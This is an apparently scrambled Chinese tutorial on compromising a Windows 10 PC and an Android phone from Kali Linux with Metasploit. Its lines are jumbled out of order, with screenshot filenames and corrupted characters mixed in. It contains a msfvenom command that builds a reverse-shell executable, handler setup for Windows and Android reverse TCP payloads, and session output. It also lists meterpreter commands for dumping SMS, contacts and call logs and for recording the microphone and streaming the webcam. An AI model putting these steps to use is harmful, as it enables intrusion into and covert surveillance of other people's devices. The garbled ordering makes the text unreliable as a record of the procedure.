kali2.0下入侵windows 10和android手机实战

  • write Writes data to a channel

    =============

    ipconfig Display interfaces

    QQ截图20160617104244

    =======================

    mkdir Make directory

    —- ————— ——– ———–

    ===========================

    resource Run the commands stored in a file

    —- ————— ——– ———–

    msf exploit(handler) > set LPORT 8888

    show options

    rm Delete the specified file

    interval_collect Manage interval collection capabilities

    exit Terminate the meterpreter session

    [*] Started reverse TCP handler on 172.19.40.110:8888

    Stdapi: Networking Commands

    set LHOST 192.168.168.111

    QQ截图20160617111438

    webcam_chat Start a video chat

    QQ截图20160617104205

    use exploit/multi/handler

    show options

    use Deprecated alias for ‘load’

    enable_unicode_encoding Enables encoding of unicode strings

    [*] Exploit completed, but no session was created.

    ——- ———–

    bgrun Executes a meterpreter script as a background thread

    Module options (exploit/multi/handler):

    ps List running processes

    dump_contacts Get contacts list

    QQ截图20160617104228

    info Displays information about a Post module

    EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)

    meterpreter > check_root

    Stdapi: Webcam Commands

    Command Description

    ——- ———–

    ^C[-] Exploit failed: Interrupt

    exploit

    lcd Change local working directory

    read Reads data from a channel

    webcam_list List webcams

    download Download a file or directory

    ifconfig Display interfaces

    webcam_stream Play a video stream from the specified webcam

    irb Drop into irb scripting mode

    pwd Print working directory

    meterpreter > help

    Command Description

    dir List files (alias for ls)

    quit Terminate the meterpreter session

    meterpreter > sessions -I

    Command Description

    set LHOST 172.19.40.110

    LHOST yes The listen address

    disable_unicode_encoding Disables encoding of unicode strings

    kali2.0入侵android手机实战

    wlan_geolocate Get current lat-long using WLAN information

    Microsoft Windows [�汾 10.0.10586]

    search Search for files

    LPORT => 8888

    check_root Check if device is rooted

    transport Change the current transport mechanism

    ——- ———–

    [*] Starting the payload handler…

    uuid Get the UUID for the current session

    [*] Starting…

    [*] Started reverse TCP handler on 192.168.168.111:3333

    cd Change directory

    set payload windows/x64/shell/reverse_tcp

    getwd Print working directory

    QQ截图20160617112853

    LPORT 4444 yes The listen port

    dump_sms Get sms messages

    ls List files

    ================

    use exploit/multi/handler

    rmdir Remove directory

    channel Displays information or control active channels

    QQ截图20160617111539

    QQ截图20160617112812

    background Backgrounds the current session

    execute Execute a command

    load Load one or more meterpreter extensions

    [*] Streaming…

    close Closes a channel

    Stdapi: File system Commands

    Stdapi: System Commands

    help Help menu

    getuid Get the user that the server is running as

    [*] Preparing player…

    send_sms Sends SMS from target session

    Command Description

    set_timeouts Set the current session timeout values

    root@kali:~# msfconsole

    record_mic Record audio from the default microphone for X seconds

    [*] Device is not rooted

    webcam_snap Take a snapshot from the specified webcam

    ——- ———–

    cat Read the contents of a file to the screen

    [*] Sending stage (60790 bytes) to 172.19.0.172

    Core Commands

    [*] Sending stage (336 bytes) to 192.168.168.109

    [*] Opening player at: kxQmnwHE.html

    geolocate Get current lat-long using geolocation

    [*] Command shell session 1 opened (192.168.168.111:3333 -> 192.168.168.109:3094) at 2016-06-16 20:59:00 -0400

    route View and modify the routing table

    [*] Starting the payload handler…

    Name Current Setting Required Description

    machine_id Get the MSF ID of the machine attached to the session

    bglist Lists running background scripts

    ? Help menu

    =======================

    sysinfo Gets information about the remote system, such as OS

    bgkill Kills a background meterpreter script

    Command Description

    set PAYLOAD android/meterpreter/reverse_tcp

    [*] Started reverse TCP handler on 172.19.40.110:4444

    upload Upload a file or directory

    (c) 2015 Microsoft Corporation����������Ȩ����

    edit Edit a file

    Name Current Setting Required Description

    [*] Meterpreter session 1 opened (172.19.40.110:8888 -> 172.19.0.172:57070) at 2016-06-16 23:11:36 -0400

    Command Description

    portfwd Forward a local port to a remote service

    get_timeouts Get the current session timeout values

    [*] Starting the payload handler…

    Payload options (windows/x64/shell/reverse_tcp):

    meterpreter > webcam_stream

    Android Commands

    ——- ———–

    QQ截图20160617112839

    msf exploit(handler) > exploit

    dump_calllog Get call log

    run Executes a meterpreter script or Post module

    ——- ———–

    exploit

    root@kali:~# service postgresql start

    shell Drop into a system command shell

    sleep Force Meterpreter to go quiet, then re-establish session.

    lpwd Print local working directory

    getlwd Print local working directory

    kali-rolling

    msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe

    ============================

    C:\Users\�ѿ�\Desktop\projects>

    set LPORT 3333